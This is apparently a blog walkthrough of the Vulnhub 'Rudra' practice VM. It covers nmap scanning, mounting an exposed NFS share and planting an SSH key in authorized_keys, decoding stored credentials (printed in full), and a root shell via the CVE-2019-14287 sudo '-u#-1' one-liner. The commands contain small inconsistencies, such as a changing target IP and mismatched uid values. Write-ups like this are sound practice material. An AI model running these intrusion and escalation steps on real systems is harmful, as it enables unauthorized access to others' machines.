Vulnhub Rudra Walkthrough

Rudra Walkthrough

We start by scanning the host with nmap -A –T4 –p- 192.168.1.19 –vv

Dirb scan gave this results :

As we can see from nmap there must be a mounted drive that we can list it by showmount –e 192.168.1.19

Ok now we are going to access this drive by entering the following commands :

mkdir shivay

mount -t nfs 192.168.1.19:/home/shivay ~/shivay

mount -t nfs -o vers=3 192.168.1.4:/home/shivay ~/shivay

ls -ld shivay

                drwxr-xr-x 2 1002 1002 4096 Oct 21 16:54 shivay

groupadd –gid 2008 shivay_group

useradd –uid 2008 –groups shivay_group shivay_user

Ok I don’t believe this file is useful , now let’s create a ssh folder and copy our keys to it so we can able to ssh to the host, we create .ssh inside the shivay folder and generate new keys:

mkdir shivay/.ssh

cp ~/.ssh/id_rsa.pub shivay/.ssh/authorized_keys

ssh shivay@192.168.1.19

and we got in … nice.

Now using LinEnum.sh script gave us  this:

So we connect to mysql by : mysql –u root

Ok we change directory to /media

Ok now we have a file hints and opening it we can find a link to an article and there is another file creds viewing it we can see some emojis … reading the article and following the steps like:

First copy the contents of the file creds to a new file on your machine and save it

Download the git file from the article and then run it.

Select 2) Decloakify a File  ( locate the file you saved before ) and then Enter cipher #: 20

And your file will be saver as new name, view it and there is a new username and a password where we can use to login with ssh

The file content mahakaal:kalbhairav

It took me a while and a while to figure it out till I found a link to this exploit

https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability

sudo -u#-1 watch -x sh -c ‘reset; exec sh 1>&0 2>&0’ –u

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s